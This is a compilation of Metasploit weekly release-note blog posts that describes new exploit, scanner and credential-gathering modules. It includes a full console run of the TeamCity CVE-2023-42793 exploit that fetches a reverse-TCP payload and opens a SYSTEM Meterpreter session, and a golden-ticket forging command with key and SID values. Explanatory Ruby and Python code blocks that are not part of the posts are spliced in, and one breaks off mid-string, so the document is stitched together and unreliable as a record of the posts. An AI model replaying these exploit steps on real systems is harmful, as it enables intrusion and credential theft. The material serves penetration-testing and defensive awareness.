Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website that utilizes AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

  • #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
  • #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn’t an exact match, even though credentials for a domain (e.g. windomain.local) should work on a host within it (e.g. dc.windomain.local).
  • #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.
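The domain-versus-host matching rule described above, as an added Ruby example that is not Metasploit's own code: a cached credential issued for a domain may be used against hosts under that domain, while look-alike names must never match. The credential records and hostnames are constructed.

```ruby
# Added example, not Metasploit's own code: deciding whether a cached
# Kerberos credential issued for one name may be used against a target host.
# A credential for the domain windomain.local should cover dc.windomain.local,
# but a look-alike such as evilwindomain.local must never match. All names
# below are constructed.

def normalize_host(name)
  # DNS names are case-insensitive; a trailing dot marks an absolute FQDN.
  name.to_s.strip.downcase.chomp('.')
end

# True when cred_host equals target_host or is a parent domain of it.
# The suffix test is anchored on a label boundary (".windomain.local"), which
# is what stops "evilwindomain.local" from matching "windomain.local".
def host_matches?(cred_host, target_host)
  cred = normalize_host(cred_host)
  target = normalize_host(target_host)
  return false if cred.empty? || target.empty?
  return true if cred == target

  target.end_with?(".#{cred}")
end

# Pick the most specific matching credential: an exact host entry wins over a
# domain-wide one because its name is longer. Returns nil when nothing matches.
def select_credential(creds, target_host)
  creds.select { |c| host_matches?(c[:host], target_host) }
       .max_by { |c| normalize_host(c[:host]).length }
end

# Constructed ccache-style entries.
CACHED_CREDS = [
  { host: 'windomain.local',    principal: 'alice@WINDOMAIN.LOCAL' },
  { host: 'dc.windomain.local', principal: 'svc_backup@WINDOMAIN.LOCAL' },
  { host: 'other.example',      principal: 'bob@OTHER.EXAMPLE' }
].freeze

if __FILE__ == $PROGRAM_NAME
  %w[dc.windomain.local fs01.windomain.local evilwindomain.local].each do |t|
    cred = select_credential(CACHED_CREDS, t)
    puts "#{t}: #{cred ? cred[:principal] : 'no matching credential'}"
  end
end
```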

Bugs fixed (1)

  • #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5’s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control

Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal (@rootxharsh), Rahul Maini (@iamnoooob), SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

  • #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
  • #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
  • #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
  • #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

  • #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
  • #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files for cleanup after a session opens. Previously, modules could accidentally mutate the registered file names to delete, leaving the intended files behind on the remote system.

Documentation added (1)

  • #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and kill stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/10/19/metasploit-weekly-wrap-up-32/

That Privilege Escalation Escalated Quickly

This release features a module leveraging CVE-2023-22515, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a privilege escalation, but quickly recategorized as a “broken access control” with a CVSS score of 10. The exploit itself is very simple and easy to use so there was little surprise when CISA published an advisory stating that threat actors were using it in the wild. It is imperative that anyone using the affected versions mitigate risk and patch as quickly as possible.

Improved sessions searching

This release enhances the sessions command with additional search filters, for instance:

sessions -S 'session_id:1 session_id:5'
sessions -S 'session_type:meterpreter'
sessions -S 'last_checkin:greater_than:1h10m last_checkin:less_than:2h'

These search options can be used in conjunction with other session options. For instance the --verbose flag:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -v

Active sessions
===============

  Session ID: 8
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50564 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 4d78f75abbdbf0c8/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 18003s ago @ 2023-10-19 15:45:30 +0100
  Registered: No

  Session ID: 9
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50565 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 48d32692e0633293/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 10803s ago @ 2023-10-19 17:45:30 +0100
  Registered: No

Or as an easy way to search for and kill matching stale sessions with --kill-all:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -K
[*] Killing matching sessions...

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50540 (192.168.123.132)
  5         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50555 (192.168.123.132)

[*] 192.168.123.132 - Meterpreter session 4 closed.
[*] 192.168.123.132 - Meterpreter session 5 closed.
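The filter syntax shown above, as an added stand-alone parser and matcher written in Ruby (not Metasploit's own implementation), run against constructed session records. The combination rule is an assumption: values repeated for session_id or session_type are OR'd, distinct keys are AND'd, and last_checkin bounds are AND'd so that greater_than and less_than together describe a range.

```ruby
# Added example, not Metasploit's own code: a parser and matcher for filter
# expressions of the shape used by `sessions -S`, run against constructed
# session records. Assumed combination rule: values repeated for session_id or
# session_type are OR'd, distinct keys are AND'd, and last_checkin bounds are
# AND'd so that greater_than/less_than together describe a range.

DURATION_UNITS = { 'd' => 86_400, 'h' => 3600, 'm' => 60, 's' => 1 }.freeze

# "1h10m" -> 4200 seconds. Rejects anything that is not number+unit pairs so a
# malformed duration fails loudly instead of silently matching nothing.
def parse_duration(text)
  raise ArgumentError, "bad duration: #{text}" unless text.match?(/\A(\d+[dhms])+\z/)
  text.scan(/(\d+)([dhms])/).sum { |n, unit| n.to_i * DURATION_UNITS[unit] }
end

# Turns "session_id:1 session_type:shell last_checkin:greater_than:1h" into
# { "session_id" => [1], "session_type" => ["shell"],
#   "last_checkin" => [["greater_than", 3600]] }. Unknown keys are an error,
# so a misspelled key cannot silently match nothing.
def parse_filter(expr)
  filters = Hash.new { |h, k| h[k] = [] }
  expr.split.each do |token|
    key, *rest = token.split(':')
    case key
    when 'session_id'
      raise ArgumentError, "bad token: #{token}" unless rest.size == 1 && rest[0].match?(/\A\d+\z/)
      filters[key] << rest[0].to_i
    when 'session_type'
      raise ArgumentError, "bad token: #{token}" unless rest.size == 1
      filters[key] << rest[0]
    when 'last_checkin'
      op, duration = rest
      raise ArgumentError, "bad token: #{token}" unless rest.size == 2 && %w[greater_than less_than].include?(op)
      filters[key] << [op, parse_duration(duration)]
    else
      raise ArgumentError, "unknown filter key: #{key.inspect}"
    end
  end
  filters
end

def session_matches?(session, filters, now)
  filters.all? do |key, values|
    case key
    when 'session_id'   then values.include?(session[:id])
    when 'session_type' then values.include?(session[:type])
    when 'last_checkin'
      idle = now - session[:last_checkin] # seconds since the last check-in
      values.all? { |op, secs| op == 'greater_than' ? idle > secs : idle < secs }
    end
  end
end

def filter_sessions(sessions, expr, now: Time.now)
  filters = parse_filter(expr)
  sessions.select { |s| session_matches?(s, filters, now) }
end

# Constructed records: id, type and last check-in time.
NOW = Time.at(1_700_000_000).freeze
SESSIONS = [
  { id: 4, type: 'meterpreter', last_checkin: NOW - 60 },     # 1 minute idle
  { id: 5, type: 'meterpreter', last_checkin: NOW - 4_500 },  # 1h15m idle
  { id: 8, type: 'meterpreter', last_checkin: NOW - 18_003 }, # ~5h idle
  { id: 9, type: 'shell',       last_checkin: NOW - 10_803 }  # ~3h idle
].freeze

if __FILE__ == $PROGRAM_NAME
  stale = filter_sessions(SESSIONS, 'last_checkin:greater_than:2h30m', now: NOW)
  puts "stale sessions: #{stale.map { |s| s[:id] }.join(', ')}"
end
```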

New module content (2)

Apache Superset Signed Cookie RCE

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Exploit
Pull request: #18351 contributed by h00die
Path: linux/http/apache_superset_cookie_sig_rce

Description: This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.

Atlassian Confluence Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18461 contributed by sfewer-r7
Path: multi/http/atlassian_confluence_rce_cve_2023_22515

Description: This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions 8.0.0 through 8.3.2, 8.4.0 through 8.4.2, and 8.5.0 through 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware, then uploads a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created; this requires a manual cleanup.

Enhancements and features (7)

  • #17689 from manishkumarr1017 – Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar.
  • #18364 from zgoldman-r7 – Add support for filtering sessions based on last checkin time, session type and id.
  • #18381 from sjanusz-r7 – Adds new options -r and --reload-libs to the check, recheck, to_handler, reload, run and rerun commands. This new option will reload all library files before performing the original command.
  • #18428 from AleksaZatezalo – This PR adds documentation for the mssql_login module.
  • #18438 from adfoster-r7 – Makes improvements to the UX for database management prompts. Now when running msfdb init the user is no longer prompted for database deletion. The message for clearing unused data service credentials has been reworded.
  • #18450 from adfoster-r7 – Adds support for Ruby 3.3.0-preview2.
  • #18451 from adfoster-r7 – Updates the newly added cracked password column as part of the creds to work with the remote database.

Bugs fixed (3)

  • #18442 from adfoster-r7 – Improves stability of msfdb initialization on Windows environments. Previously the msfdb init script would hang indefinitely on Windows, and there were false negatives when detecting whether the database was running.
  • #18443 from adfoster-r7 – Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
  • #18449 from adfoster-r7 – Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.

Documentation added (1)

  • #18452 from jheysel-r7 – Updates the Metasploit Wiki to include information on how to run quality tools on module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/10/13/metasploit-weekly-wrap-up-31/

Pollution in Kibana

This week, contributor h00die added a module that leverages a prototype pollution bug in Kibana prior to version 7.6.3. Specifically, the issue is within the Upgrade Assistant and enables an attacker to execute arbitrary code. The vulnerability can be triggered by sending queries that set a new constructor.prototype.sourceURL directly to Elastic, or by using Kibana to submit the same queries. Note that Kibana needs to be restarted, or the telemetry collection needs to run, before the payload executes. This vulnerability doesn’t appear to have been assigned a CVE. The module was written based on a detailed description from Alex Brasetvik (alexbrasetvik) in a HackerOne report.

Torch chain attack

Our very own zeroSteiner added a module that exploits PyTorch model server by chaining multiple vulnerabilities. First, it takes advantage of a weak default configuration that binds the management interface to all IP addresses. Then, once it reaches the management interface, the module exploits a Server-Side Request Forgery vulnerability (CVE-2023-43654) to register MAR (Model Archive) model files from arbitrary servers. Finally, it leverages a vulnerability in SnakeYaml (CVE-2022-1471) that allows code execution when a YAML file is deserialized by SnakeYaml. The module embeds a malicious YAML file in a MAR file and gets an arbitrary Java class executed when this MAR file is loaded.

Updated MySQL version support

Thanks to the work of Rory McKinley, multiple MySQL modules now support authentication against newer MySQL 8.0 versions. This required a lot of effort unearthing and patching historical code across multiple contributions to the Metasploit codebase, and to the Ruby MySQL library dependency. MySQL module highlights include:

  • auxiliary/scanner/mysql/mysql_login – Bruteforce and manual verification of MySQL credentials
  • auxiliary/scanner/mysql/mysql_version – MySQL Server Version Enumeration
  • auxiliary/scanner/mysql/mysql_hashdump – MySQL password hashdump support
  • auxiliary/scanner/mysql/mysql_schemadump – Extracting MySQL schema details
  • auxiliary/admin/mysql/mysql_sql – Run arbitrary MySQL SQL queries against a given target

New module content (2)

Kibana Upgrade Assistant Telemetry Collector Prototype Pollution

Authors: Alex Brasetvik (alexbrasetvik) and h00die
Type: Exploit
Pull request: #18417 contributed by h00die
Path: linux/http/kibana_upgrade_assistant_telemetry_rce

Description: Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we’re able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.

PyTorch Model Server Registration and Deserialization RCE

Authors: Gal Elbaz, Guy Kaplan, Idan Levcovich, Spencer McIntyre, and Swapneil Kumar Dash
Type: Exploit
Pull request: #18427 contributed by zeroSteiner
Path: multi/http/torchserver_cve_2023_43654

Description: This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.

Enhancements and features (6)

  • #18171 from dwelch-r7 – This fixes an issue when users use a payload while the framework is started with the --defer-module-loads flag set. This also adds a new feature flag option, defer_module_loads, which, when enabled, defers module loads by default without the need to specify --defer-module-loads every time the framework boots. Finally, this comes with a sizable improvement in the framework’s boot-up time.
  • #18256 from jmartin-tech – Performs a routine update of multiple library dependencies.
  • #18296 from rorymckinley – Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
  • #18383 from cgranleese-r7 – This adds a variety of improvements to the enum_computers module, including Shell and PowerShell support as well as improvements when running on non-English systems.

Bugs fixed (2)

  • #18411 from rtpt-erikgeiser – Fixes an issue where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
  • #18431 from zeroSteiner – This switches the way in which port forwarded IPs are displayed so that the local IP is listed under local and the remote IP is listed under remote.

Documentation added (1)

  • #18394 from errorxyz – This adds documentation for the auxiliary/scanner/http/http_traversal module.
  • #18435 from h00die – Fixes multiple spelling mistakes in the Wiki.
  • #18444 from h00die – Fixes spelling mistakes in module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap Up

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2023/10/06/metasploit-weekly-wrap-up-30/

New module content (3)

LDAP Login Scanner

Author: Dean Welch
Type: Auxiliary
Pull request: #18197 contributed by dwelch-r7
Path: scanner/ldap/ldap_login

Description: This PR adds a new login scanner module for LDAP. Login scanners are the classes that provide functionality for testing authentication against various protocols and mechanisms. This LDAP login scanner supports multiple types of authentication, including plaintext, NTLM, Kerberos and SChannel.

Junos OS PHPRC Environment Variable Manipulation RCE

Authors: Jacob Baines, Ron Bowes, and jheysel-r7
Type: Exploit
Pull request: #18389 contributed by jheysel-r7
Path: freebsd/http/junos_phprc_auto_prepend_file

Description: This adds an exploit module that leverages a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. This vulnerability is identified as CVE-2023-36845 and allows an attacker to achieve unauthenticated remote code execution as a low privileged user. This module also includes a jailbreak feature that consists of changing the root password and establishing an SSH session as the root user. The original password is restored when the module terminates.

Progress Software WS_FTP Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18414 contributed by sfewer-r7
Path: windows/http/ws_ftp_rce_cve_2023_40044

Description: This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

AttackerKB Assessment: (https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis)

Enhancements and features (6)

  • #17919 from bcoles – This PR adds support for starting and stopping Windows services using the service control manager to shell payloads.
  • #18338 from smashery – This PR updates the kerberos.rb library so that when a Kerberos login is attempted against a user account for which pre-authentication is not required, the module now requests an RC4-HMAC ticket, since it’s more easily crackable.
  • #18363 from j0ev – This PR adds support for outputting payloads in octal in both framework and venom.
  • #18412 from zeroSteiner – This adds additional usage tips to Metasploit, expanding the pool that is selected from on startup.
  • #18420 from smashery – This PR updates the user-agent string reported by our HTTP payloads. We update this periodically to make sure that our payloads don’t stand out by carrying an older user-agent string.
  • #18425 from adfoster-r7 – Adds history support to the nasm and metasm shells. Now when re-opening these shells, previously typed commands should be remembered and available.

Bugs fixed (1)

  • #18372 from gcarmix – Fixed an issue in the generic shell download command.

Documentation added (3)

  • #18277 from cnnrshd – This PR adds new documentation for how to create a command injection exploit module.
  • #18347 from bwatters-r7 – This PR updates the how-to-write-a-check-method docs to better explain that fail_with should not be used in a check method, in line with the best practice that a check method always returns a check code.
  • #18393 from adfoster-r7 – Updates the running modules landing page on the Wiki with more beginner friendly information on searching for and running modules.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for the JetBrains TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.

Enhancements and features (1)

  • #18399 from h00die – Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/22/metasploit-weekly-wrap-up-28/

Improved Ticket Forging

Metasploit’s admin/kerberos/forge_ticket module has been updated to work with Server 2022. Starting with Windows Server 2022, Microsoft requires two additional PAC elements to be present: the PAC requestor and the PAC attributes. Newly forged tickets now have these elements added automatically, derived from the user-provided domain SID and user RID. For example:

msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f64924fb50be1e23978 domain_sid=S-1-5-21-1242350107-3695253863-3717863007 USER_RID=500 domain=demo.local user=Administrator action=FORGE_GOLDEN

[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230915213733_default_unknown_mit.kerberos.cca_219182.bin
[*] Primary Principal: [email protected]
Ccache version: 4

....
            Pac Requestor:
              SID: S-1-5-21-1242350107-3695253863-3717863007-500
            Pac Attributes:
              Flag length: 2
              Flags: 1
                .... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
                .... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
            Pac Server Checksum:
              Signature: 1f94f52598b37bb9cf7e3995
            Pac Privilege Server Checksum:
              Signature: 79ec20b7d4b8e77e5c056563

The domain SID and user RIDs can be obtained using the auxiliary/gather/ldap_query module with the ENUM_DOMAIN and ENUM_ACCOUNTS actions.
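As an added example (not code from Metasploit or the forge_ticket module), the following Python encodes the two PAC elements Server 2022 requires for the domain SID and RID shown in the run above, wraps them in a PACTYPE header and parses them back the way a ticket consumer validating them would. Buffer layouts follow MS-PAC, the flag bit positions follow the module output above, and the PAC blob is constructed sample data.

```python
"""Encode, parse and sanity-check the PAC_REQUESTOR and PAC_ATTRIBUTES_INFO buffers.

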